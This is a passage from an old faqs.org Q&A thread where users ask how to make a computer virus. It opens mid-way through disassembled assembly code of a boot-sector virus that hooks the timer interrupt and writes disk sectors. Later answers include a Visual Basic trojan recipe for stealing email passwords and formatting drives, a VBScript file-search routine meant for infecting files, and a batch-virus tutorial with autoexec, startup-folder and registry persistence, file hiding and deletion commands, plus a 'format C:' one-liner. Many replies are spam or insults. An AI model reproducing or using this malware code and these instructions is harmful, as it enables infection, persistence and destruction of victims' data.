;7EA3 58 SUB AX,40 ;'@' ;7EA4 2D 40 00 MOV ES,AX ;7EA7 8E C0 MOV BX,0 ;7EA9 BB 00 00 CALL WRITESC ;Writes sector BX = LSN ;7EAC E8 E9 FD RET_NEAR ;7EAF C3 ;L7EB0 L7D05 DR L7D09 DW ; Last time drive is accessed TIME DW L49E8 ;7EB0 E8 49 ;L7EB2 L7DEC DW L7E08 DM L7E21 DR ; Adjust pointer in FAT FAT_ADJUST EQU $ DB 0 ;7EB2 00 ;L7EB3 L7CFF CC ; Activate Ball on Screen BALL_ACT: TEST BYTE PTR FLAGS,2 ;Sum semapfor type flags ;7EB3 F6 06 F7 7D 02 JNZ EXIT_BALL_ACT ;7EB8 75 24 OR BYTE PTR FLAGS,2 ;Sum semapfor type flags ;7EBA 80 0E F7 7D 02 MOV AX,0 ;7EBF B8 00 00 MOV DS,AX ;7EC2 8E D8 MOV AX,DS:TIMER_OFF ;7EC4 A1 20 00 MOV BX,DS:TIMER_SEG ;7EC7 8B 1E 22 00 MOV WORD PTR DS:TIMER_OFF,OFFSET TIMER ;Timer Interrupt Handler ;7ECB C7 06 20 00 DF 7E MOV DS:TIMER_SEG,CS ;7ED1 8C 0E 22 00 PUSH CS ;7ED5 0E POP DS ;7ED6 1F MOV OLD_TIMER_OFF,AX ;7ED7 A3 C9 7F MOV OLD_TIMER_SEG,BX ;7EDA 89 1E CB 7F ;L7EDE L7EB8 CJ EXIT_BALL_ACT: RET_NEAR ;7EDE C3 ;L7EDF L7ECB DI ; Timer Interrupt Handler TIMER: PUSH DS ;7EDF 1E PUSH AX ;7EE0 50 PUSH BX ;7EE1 53 PUSH CX ;7EE2 51 PUSH DX ;7EE3 52 PUSH CS ;7EE4 0E POP DS ;7EE5 1F MOV AH,0F ;7EE6 B4 0F INT 10 ;7EE8 CD 10 MOV BL,AL ;7EEA 8A D8 CMP BX,L7FD4 ;Sum vars ;7EEC 3B 1E D4 7F JZ L7F27 ;7EF0 74 35 MOV L7FD4,BX ;Sum vars ;7EF2 89 1E D4 7F DEC AH ;7EF6 FE CC MOV L7FD6,AH ;Sum vars ;7EF8 88 26 D6 7F MOV AH,1 ;7EFC B4 01 CMP BL,7 ;7EFE 80 FB 07 JNZ L7F05 ;7F01 75 02 DEC AH ;7F03 FE CC ;L7F05 L7F01 CJ L7F05: CMP BL,4 ;7F05 80 FB 04 JNB L7F0C ;7F08 73 02 DEC AH ;7F0A FE CC ;L7F0C L7F08 CJ L7F0C: MOV L7FD3,AH ;Sum vars ;7F0C 88 26 D3 7F MOV WORD PTR L7FCF,101 ;7F10 C7 06 CF 7F 01 01 MOV WORD PTR L7FD1,101 ;7F16 C7 06 D1 7F 01 01 MOV AH,3 ;7F1C B4 03 INT 10 ;7F1E CD 10 PUSH DX ;7F20 52 MOV DX,L7FCF ;7F21 8B 16 CF 7F JMP SHORT L7F4A ;7F25 EB 23 ;L7F27 L7EF0 CJ L7F27: MOV AH,3 ;7F27 B4 03 INT 10 ;7F29 CD 10 PUSH DX ;7F2B 52 MOV AH,2 ;7F2C B4 02 MOV DX,L7FCF ;7F2E 8B 16 CF 7F INT 10 ;7F32 CD 10 MOV AX,L7FCD ;Sum vars ;7F34 A1 CD 7F CMP BYTE PTR L7FD3,1 ;Sum vars ;7F37 80 3E D3 7F 01 JNZ L7F41 ;7F3C 75 03 MOV AX,OFFSET L8307 ;7F3E B8 07 83 ;L7F41 L7F3C CJ L7F41: MOV BL,AH ;7F41 8A DC MOV CX,1 ;7F43 B9 01 00 MOV AH,9 ;7F46 B4 09 INT 10 ;7F48 CD 10 ;L7F4A L7F25 CJ L7F4A: MOV CX,L7FD1 ;7F4A 8B 0E D1 7F CMP DH,0 ;7F4E 80 FE 00 JNZ L7F58 ;7F51 75 05 XOR CH,0FF ;7F53 80 F5 FF INC CH ;7F56 FE C5 ;L7F58 L7F51 CJ L7F58: CMP DH,18 ;7F58 80 FE 18 JNZ L7F62 ;7F5B 75 05 XOR CH,0FF ;7F5D 80 F5 FF INC CH ;7F60 FE C5 ;L7F62 L7F5B CJ L7F62: CMP DL,0 ;7F62 80 FA 00 JNZ L7F6C ;7F65 75 05 XOR CL,0FF ;7F67 80 F1 FF INC CL ;7F6A FE C1 ;L7F6C L7F65 CJ L7F6C: CMP DL,L7FD6 ;Sum vars ;7F6C 3A 16 D6 7F JNZ L7F77 ;7F70 75 05 XOR CL,0FF ;7F72 80 F1 FF INC CL ;7F75 FE C1 ;L7F77 L7F70 CJ L7F77: CMP CX,L7FD1 ;7F77 3B 0E D1 7F JNZ L7F94 ;7F7B 75 17 MOV AX,L7FCD ;Sum vars ;7F7D A1 CD 7F AND AL,7 ;7F80 24 07 CMP AL,3 ;7F82 3C 03 JNZ L7F8B ;7F84 75 05 XOR CH,0FF ;7F86 80 F5 FF INC CH ;7F89 FE C5 ;L7F8B L7F84 CJ L7F8B: CMP AL,5 ;7F8B 3C 05 JNZ L7F94 ;7F8D 75 05 XOR CL,0FF ;7F8F 80 F1 FF INC CL ;7F92 FE C1 ;L7F94 L7F7B CJ L7F8D CJ L7F94: ADD DL,CL ;7F94 02 D1 ADD DH,CH ;7F96 02 F5 MOV L7FD1,CX ;7F98 89 0E D1 7F MOV L7FCF,DX ;7F9C 89 16 CF 7F MOV AH,2 ;7FA0 B4 02 INT 10 ;7FA2 CD 10 MOV AH,8 ;7FA4 B4 08 INT 10 ;7FA6 CD 10 MOV L7FCD,AX ;Sum vars ;7FA8 A3 CD 7F MOV BL,AH ;7FAB 8A DC CMP BYTE PTR L7FD3,1 ;Sum vars ;7FAD 80 3E D3 7F 01 JNZ L7FB6 ;7FB2 75 02 MOV BL,83 ;7FB4 B3 83 ;L7FB6 L7FB2 CJ L7FB6: MOV CX,1 ;7FB6 B9 01 00 MOV AX,907 ;7FB9 B8 07 09 INT 10 ;7FBC CD 10 POP DX ;7FBE 5A MOV AH,2 ;7FBF B4 02 INT 10 ;7FC1 CD 10 POP DX ;7FC3 5A POP CX ;7FC4 59 POP BX ;7FC5 5B POP AX ;7FC6 58 POP DS ;7FC7 1F ; Jmp Far opcode DB 0EA ;7FC8 EA ;L7FC9 L7ED7 DW OLD_TIMER_OFF EQU $ DW TIMER_OFF ;7FC9 20 00 ;L7FCB L7EDA DW OLD_TIMER_SEG EQU $ DW L0000 ;7FCB 00 00 ;L7FCD L7F34 DR L7F7D DR L7FA8 DW ; Sum vars L7FCD DW L0000 ;7FCD 00 00 ;L7FCF L7F10 DW L7F21 DR L7F2E DR L7F9C DW L7FCF DW L0101 ;7FCF 01 01 ;L7FD1 L7F16 DW L7F4A DR L7F77 DT L7F98 DW L7FD1 DW L0101 ;7FD1 01 01 ;L7FD3 L7F0C DW L7F37 DT L7FAD DT ; Sum vars L7FD3 DB 0 ;7FD3 00 ;L7FD4 L7EEC DT L7EF2 DW ; Sum vars L7FD4 DW LFFFF ;7FD4 FF FF ;L7FD6 L7EF8 DW L7F6C DT ; Sum vars L7FD6 DB 50 ;7FD6 50 ;L8000 L7CC7 DI L7E2D DR L7E68 DM L8000 EQU $+29 ;L8002 L7D63 DI L8002 EQU $+2Bh ;L800B L7D8B DT L800B EQU $+34 ;L800D L7D93 DT L800D EQU $+36 ;L800E L7D9A DR L800E EQU $+37 ;L8010 L7D9E DR L8010 EQU $+39 ;L8011 L7DAB DR L8011 EQU $+3A ;L8016 L7DA2 DR L8016 EQU $+3F ;L81BE L7D40 DI L81BE EQU $+1E7 ;L81F5 L7D7D DR L81F5 EQU $+21E ;L81F9 L7D83 DR L81F9 EQU $+222 ;L81FB L7D76 DT L81FB EQU $+224 ;L81FC L7D6E DT L81FC EQU $+225 ;L8307 L7F3E DI L8307 EQU $+330 ;LFFC0 L7C66 DI LFFC0 EQU $+7FE9 ;LFFF7 L7E51 DI LFFF7 EQU $-7FE0 ;LFFFF L7FD4 CI LFFFF EQU $-7FD8 S0000 ENDS ; END this code in .bat or what? need help!

Answer by hackerx
Submitted on 5/27/2005
Rating: Not yet rated	Rate this answer:
Trojan in VB 5.0 Trojans are the most rare virii, but they are the most destructive and dangerous because usualy the payload is real-real-bad! They can steal your e-mail passw., NET connection or format your HardDrive. I choosed VB because it compiles very small files (min. 8-9kb instead of 200kb- Delphi). GO: Step I (Hmmm...) Start your VB 5+ . Begin a new project and a new form. Step II (code'nstuff) Put some funny or realy serious buttons on the form (ex. a program that reads your e-mail faster: you enter your e-mail adress and password, but it will actualy send them to your e-mail; or a FunStuff that asks u if u have a small brain, you can only choose YES). Write some code in the code window. Format c:, delete all files in the Windows DIR, connect to a web site etc. THE POSIBILITIES ARE ENDLESS!!! THE LIMIT IS YOUR IMAGINATION ! HAV PHUN :> Step III (finish) Write help file so it's more like a real program. Salve & compile! Distribute on the NET...OVER !!!

Answer by Da man
Submitted on 2/13/2006
Rating: Not yet rated	Rate this answer:
This tutorial will teach you how to search for a file or filetype in all the drives of the host computer withou using word or any external app, this is very usefull to infect html's or others vbs's, also you can always find mirc or pirch if it's installed on the host computer. The idea of the code is very simple, you just have to use the "Files" and "SubFolders" objects that are inside a "Folder" object. ---o--- 'First of all, you have declare the variables and create the FileSystem object. Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder Set Fso=createobject("scripting.filesystemobject") 'Then, Set the Drives object, so you can search in all the available drives of the computer Set Drives=fso.drives 'Now do a for-each for each drive For Each Drive in Drives 'Drive is the name that we give to the drive we're working on. If drive.isready then 'This check is the remobable devices, like floppy's or Cdrom's are abailable. Dosearch drive 'Dosearch is the name of the function that we'll use to search for files and subfolders. end If Next 'Now we start the main search funtion Function Dosearch(Path) 'Get the folder where we have to work. Set Folder=fso.getfolder(path) 'Get all the files inside this folder Set Files = folder.files 'Now do a for-each for each file For Each File in files 'File is the current file where we are 'Here is where we can do something with the file, this gets the file extencion, and if it's the one that you want you can do whatever you want to it. File.path is the file fullpath, and file.name gives you only the filename with its extencion. If fso.GetExtensionName(file.path)="vbs" then msgbox file.path 'Just to do something end If 'With the nex thing you can find an exact file. If file.name = "mirc.ini" then msgbox "Mirc found in " & file.ParentFolder ' If the file path is "c:\mirc\mir.ini" the file parentfolder is "c:\mirc" end If Next 'Once that we check all files we start working with subfolders 'Get all subfolders in our main folder Set Subfolders = folder.SubFolders 'Now, for each subfolder For Each Subfolder in Subfolders 'Call this function with the subfolder. Dosearch Subfolder.path Next end function ---o--- The Dosearch function will go inside every folder and subfolders in every drive, so you scan all the computer without using word or any other external app.

Answer by playa
Submitted on 4/13/2006
Rating: Not yet rated	Rate this answer:
--------------------------------------------------------------------------------------------------------------------------------------------------------- ________________________________ \| A noobs guide to: \| \| How to make a batch virus \| \| Part1 \| \| netkid03 \| netkid03@yahoo.com \| \|___________\|____________________\| --------------------------------------------------------------------------------------------------------------------------------------------------------- I made this tutorial with ms word for windows 98 users, but most of the information here will work on all window versions. CONTENCE -Disclaimer -Introduction -From the beginning -Laying out your batch files -Loops -The If, elif and else commands -Autoexec and startup -Deleting files in batch -Conclusion --------------------------------------------------------------------------------------------------------------------------------------------------------- Disclaimer This tutorial is for educational purposes only and is not to be used in any illegal way. The author of this tutorial/website is not responsible for any damage caused by this tutorial. No one is forcing you to read this so if you do not accept the terms of this disclaimer please leave the site now. You can send this tutorial to your friends or put it on your website as long as you keep the title box with the name "netkid03" on it and do not modify it. Use it for to educate you and others in computers, and don�t use it in any other way. --------------------------------------------------------------------------------------------------------------------------------------------------------- Introduction Ok, so you want to make a virus? Well batch is the easiest language to use. Below is a definition of batch and virus so you know exactly what this tutorial is about. http://www.webopedia.com/TERM/B/batch_file.html �A file that contains a sequence, or batch, of commands. Batch files are useful for storing sets of commands that are always executed together because you can simply enter the name of the batch file instead of entering each command individually. In DOS systems, batch files end with a.BAT extension. For example, the following DOS batch file prints the date and time and sets the prompt to GO>: date time prompt [GO>] Whenever you boot a DOS -based computer, the system automatically executes the batch file named AUTOEXEC.BAT, if it exists. Many operating systems use the terms command file or shell script in place of batch file.� http://www.webopedia.com/TERM/v/virus.html �A program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are manmade. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems. Since 1987, when a virus infected ARPANET, a large network used by the Defence Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses. Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.� So now you know what a batch file is and what a virus is I will explain what a batch virus is. �A batch virus is a simple program that uses dos commands and runs in a dos prompt window. It is run as soon as the user opens it and can be set to run when your victim starts up their p.c. It causes damage to the victims computer and in some cases can spread to other computers.� From the Beginning Ok in this I will describe some basic dos commands and how to use them. Firstly open a text editor (I think notepad is the best text editor to use and it comes free with windows, click start run and type in notepad) Ok now this tool is were you will be making all your batch files from now on. If your are use to using dos then this should be easy for you as most of the commands are simply dos commands. Now type this in your text editor: @echo off echo Hello I�m your first batch file Now save the file as �Untitled.bat� (you must save all your batch files as .bat for them to work). Open the file you have just created and you should see a dos prompt box put up that says, Hello I�m your first batch file, now I�m going to explain line by line how this code works. The first line (@echo off) is used to turn echo off which basically means it doesn�t display everything else that is going on but just shows things you have chosen to display on screen. You may be wondering why it�s @echo off and not just echo off well the �@� turns echo off just for the line you have put it on so it stops the dos prompt box from displaying �echo off� you can test this code for your self without the @echo off to see what I mean. The second line uses the �echo� command to display �Hello I�m your first batch file to the screen� when ever you want to display text you need to use the echo command, it will not work if you don�t! Well done you (hopefully) have just made and understood your first batch program, (that wasn�t so hard was it?) Laying out your batch files If your code doesn�t work but it�s laid out neatly you will be able to quickly find the problem and fix it. A good way to lay out you code is to use labels and the �goto� command here is an example of how to use labels/goto command @echo off :start echo hello goto next :next echo this text is in the �next� secton goto end :end echo and this code is in the �end� section This is a simple batch file using labels and goto commands. The labels start off with colon (:) and the goto commands are simply �goto (the name of your label)�. Note: you do not need to use a colon in goto commands. You don�t have to put your labelled sections in order, the code would work exactly the same if the �end� section was in-between the �start� and �next� section. This is because the goto commands tell the code exactly were it should go next. It would be useful if you experiment with this and see what happens when you switch them round. Loops But this isn�t all you can do with the goto command. One of the main uses of labels and using the goto command are loops. Loops are pices of code that keep repeating them self in a loop. E.g. @echo off :loop echo I�m a loop goto loop The result of that simple code is show below� You can place anything in a loop and it will keep going forever (or until the computer crashes). The If, elif and else commands So now you know how to make a basic loop, but what if you wanted your loop to keep going until something happens and then do something else? Well you could place a if command in the loop, this will make the loop keep going but if something happens then it will go somewhere else in your code. So lets add to are loop we made before. @echo off :loop if exist c:\AutoExec.bat goto autoexec else echo You don�t have autoexe goto loop :autoexec echo you have autoexec goto loop I compiled it (made it into a batch file) and opened it and this is what happened. If you want to use else and if combined then you can use the elif command. Here is an example: @echo off :loop if exist c:\AutoExec.bat goto autoexec elif exist c:\windows goto windows else echo You don�t have autoexec.bat and you don�t have a windows folder goto loop :autoexec echo you have autoexec goto loop :autoexec echo you have a windows folder but you don�t have autoexec.bat goto loop autoexec and startup To make a successful virus it�s a good idea to make the virus startup when your victim turns on there computer. This will keep there computer infected and make it harder for them to remove. There are a number of ways you can do this. Firstly you could add your virus code to the end of autoexec.bat. In windows autoexec starts up before windows loads. There are some advantages and some disadvantages to this. The main advantage is it�s one of the first files there computer will load and the main disadvantage is it loads before windows meaning any window commands like opening up a windows file or anything like that wont work. To add your virus to the end of autoexec simply type this somewhere in your batch file: echo copy %0 >> c:\autoexec.bat %0 will automatically replace itself with your viruses root/name which means it doesn�t mater were your victim downloads/moves your virus will still work. If you want to copy a different batch file to autoexec then just use this code: echo copy C:\filename\batchfile.bat >> c:\autoexec.bat just replace �C:\filename\batchfile.bat� with the root to a batch file. If you don�t want to copy your whole batch virus to autoexec and just want to copy a few commands then you can use this code: echo rem this is were you type what you want to copy >> c:\autoexec.bat just replace �rem this is were you type what you want to copy� with any batch commands you want to put on the end of autoexec. So, now you know how to add your virus to autoexec I will show you another way. Using the windows startup folder. This method also has some disadvantages and advantages. The main advantage is you can use all batch commands in it and open windows programs, the main disadvantage is it is easy for your victim to remove your virus from the startup folder as it is in there start menu. To add your code to this folder simply add this to your batch file: copy %0 c:\windows\startm~1\Programs\StartUp\whateveryouwant.bat You can change �whateveryouwant.bat� to whatever you want your file to be called and you can change c:\windows\startm~1\program\startup to anywhere else you want to copy your virus. You can also make your virus a bit more hidden by adding this Attrib +r +h C:\windows\startm~1\program\startup\whateveryouwant.bat after you have copied your virus to the startup folder. This will make your virus hidden and read-only. There is one more way that I will show you, this (in my opinion) is the best out of the three (it�s also the hardest). This method wills startup your virus when windows loads and it will do it far sneakier/effective than the other two ways I have shown you. We are going to write a key to your victims� computers registry, which will startup your program when windows loads. To do this we are going to �drop� and open a reg file in the batch file. Here is the code you will need to add to your batch file: echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c\regstart.reg echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg start c\regstart.reg This code writes two lines to a reg file which it then open and therefore edits the registry. If you are not familiar with the registry then don�t worry about this method. Deleting files in batch Ok, this is the first destructive command we have come across so far (you can see how this will come in handy). Simply type del and then the name/path to what you want to delete E.g. @echo off rem deleting ms paint del C:\Progra~1\Accessories\MSPAINT.EXE In this piece of code I have once again used the @echo off command (so your victim cannot see that your deleting things from hid HD). Next I have used the rem command, this is used to add a comments (remarks) these will not display on the screen (if you used the echo off command like above) and have no effect on the code. I recommend using remarks so that when you look back at your code you know what you were trying to do and it will be a lot easier to edit. The last line uses the delete command and then the path to ms paint (note: you cannot have any spaces in any paths you use. If you come across a path with spaces (like c:\program files) then change it to a six letter word with no spaces (c:\Progra) then add ~1 to the end of the 6 letter word (c:\progra~1)). Conclusion This is the end of part1. I hope you have learnt something, and use this knowledge wisely. Part2 will start showing you some more advanced batch skills; if you need any help with something in this tutorial then you can contact me at netkid03@yahoo.com. -------------------------------------------------------------------------------------------------------------------------Part2 coming soon�----- Credit goes to the maker of this guide I just want to help hope it work for you

Answer by JD_BlackHole
Submitted on 4/15/2007
Rating: Not yet rated	Rate this answer:
OK, well first off since probely none of you know much about computer learn a basic language like MS-DOS it's a language that is built into windows. OK then learn visual basics. and then you should learn like Java or C++ if you really wanna write a virus but then since you don't know any thing else other then how to write them you send it some one you wont know how to cover your tracks. and you probely get busted.. i take no responsibility for what you do with this info I'm not telling you to learn this to make viruses I'm just saying this for educational purposes. i had to say that do to legal reasons. and no one will ever tell you how to hack unless you on a very secure line that would leave no traces. sending viruses will get you put in jail. use this knowledge to create firewalls and stuff and maybe if you create a good enough one you could make some extra cash. but thats is all I'm going to say.

FAQS.ORG makes no guarantees as to the accuracy of the posts. Each post is the personal opinion of the poster. These posts are not intended to substitute for medical, tax, legal, investment, accounting, or other professional advice. FAQS.ORG does not endorse any opinion or any product or service mentioned mentioned in these posts.

<< Back to: [alt.comp.virus] FAQ Part 1/4

[ Home | FAQ-Related Q&As | General Q&As | Answered Questions ]

Question by jim
Submitted on 4/23/2004
Related FAQ: [alt.comp.virus] FAQ Part 1/4
Rating:	Rate this question:
how do you make a virus?

Answer by Caleb6164
Submitted on 4/28/2004
Rating:	Rate this answer:
I want to know how to make a computer virus!

Answer by George
Submitted on 5/25/2004
Rating:	Rate this answer:
Chicken!

Answer by ZELZAL
Submitted on 5/31/2004
Rating:	Rate this answer:
WHAT HAPPEN'D? WHY DID U CHANGE THE WEBSITE?... B4 IS BETTER THEN NOW.......... WHY DID U DO THIS? I NEED ANSW'R NOW

Answer by Ripper
Submitted on 6/19/2004
Rating:	Rate this answer:
i need 2 no how to make a virus some one please help me

Answer by computerhacker
Submitted on 6/21/2004
Rating:	Rate this answer:
First u lil wanna b'sneed to learn how to program in certain scripts such as php c++ perl java. get a decent computer, preferably a server and a criminal record lol.

Answer by boby
Submitted on 8/9/2004
Rating: Not yet rated	Rate this answer:
porno pop up

Answer by kcahehtdlrow
Submitted on 8/14/2004
Rating: Not yet rated	Rate this answer:
i created a new type or virus i call mommyschild.exe

Answer by Founder.s.
Submitted on 8/17/2004
Rating: Not yet rated	Rate this answer:
Look its simple you D/l a virus software known as Frag.send.Virus.exe and its a prog. that will let u create a virus with very simple comands and instructions. i will give u a link if you still want to make a virus. ============================================ and i dont have a criminal record.

Answer by thechemist
Submitted on 8/21/2004
Rating: Not yet rated	Rate this answer:
how can i make a worldwide powerful virus and how can i prevent it from hurting my pc lol muhahaha

Answer by shane
Submitted on 8/25/2004
Rating: Not yet rated	Rate this answer:
you stick a cock up your ass

Answer by BUllseye
Submitted on 8/25/2004
Rating: Not yet rated	Rate this answer:
Guess what all. You all a bunch of retards. You wanna no how to hack, and make virus's email me at jagex_RUnescape_844@hotmail.com If you lucky I might send you a Guide (For people who are stupid) And an advanced guide that I wrote myself

Answer by iwant a virus
Submitted on 8/28/2004
Rating: Not yet rated	Rate this answer:
hey me to how to make a virus

Answer by ankur
Submitted on 9/8/2004
Rating: Not yet rated	Rate this answer:
how to make a virus

Answer by jaba
Submitted on 9/9/2004
Rating: Not yet rated	Rate this answer:
i wanr a virus to shut down all school computers for a long time

Answer by JESSE
Submitted on 2/24/2005
Rating: Not yet rated	Rate this answer:
QBASIC VIRRI MAKER JUST EMAIL ME IF YOU WANNA KNOW SOME VIRRI CODES AT JESSEMC09@AOL.COM

Answer by mulletman
Submitted on 9/12/2004
Rating: Not yet rated	Rate this answer:
a good site for mac or apple viruses is http://freaky.staticusers.net

Answer by mat
Submitted on 9/28/2004
Rating: Not yet rated	Rate this answer:
how ya make a virus get an ip adress

Answer by VirusMaker
Submitted on 11/10/2004
Rating: Not yet rated	Rate this answer:
Just type this in the MS-DOS window: @ECHO off format C:\ -y format system -y

Answer by h
Submitted on 12/10/2004
Rating: Not yet rated	Rate this answer:
get emule with broadband and then download c++ of the internet

Answer by boris
Submitted on 12/15/2004
Rating: Not yet rated	Rate this answer:
get some womans panities on and enjoy boris dumslawski

Answer by LOL
Submitted on 12/21/2004
Rating: Not yet rated	Rate this answer:
i do virus in nopepad :P

Answer by Death
Submitted on 1/5/2005
Rating: Not yet rated	Rate this answer:
how do you make a computer virus to screw up someones computer

Answer by COPS1234567654321
Submitted on 1/9/2005
Rating: Not yet rated	Rate this answer:
u guys are stupid cops are all over this

Answer by killer
Submitted on 1/13/2005
Rating: Not yet rated	Rate this answer:
i have a criminal record it sucks cause the cops are always stalking me it sucks

Answer by hacker2
Submitted on 1/18/2005
Rating: Not yet rated	Rate this answer:
can you make me an PC virus

Answer by hax-a-lot
Submitted on 1/29/2005
Rating: Not yet rated	Rate this answer:
well i dont know how but i know some awsome runescape hacks

Answer by goodheart
Submitted on 2/25/2005
Rating: Not yet rated	Rate this answer:
professional

Answer by good
Submitted on 2/26/2005
Rating: Not yet rated	Rate this answer:
professional

Answer by falten
Submitted on 3/4/2005
Rating: Not yet rated	Rate this answer:
i have lots of question,but no answers?

Answer by theperson
Submitted on 3/12/2005
Rating: Not yet rated	Rate this answer:
Whoever is trying to make the virus, you are a complete n00b. You can make viruses in Visual Basic if you wanted to. But why the hell would you wanna stuff up peoples computers just for the hell of it. Or are you some kind of sadistic prick>

Answer by joe
Submitted on 3/17/2005
Rating: Not yet rated	Rate this answer:
i want to know also i no how to do destroy a computer enternaly,but thats only when im sitting at it lol. it has to do with the regestry editor

Answer by hkt04
Submitted on 4/1/2005
Rating: Not yet rated	Rate this answer:
help me plz, i need 2 make a virus soon!!!!! my m8 has infected my pc so i need 2 get him bk!!!

Answer by anonymous
Submitted on 4/2/2005
Rating: Not yet rated	Rate this answer:
hello my name is jonny i am an expert on writing viruses. If you need answers email me at biohazard355@yahoo.com

Answer by cibbert
Submitted on 4/5/2005
Rating: Not yet rated	Rate this answer:
killer some baby s' computer need fast software

Answer by the anger of valcano
Submitted on 4/9/2005
Rating: Not yet rated	Rate this answer:
no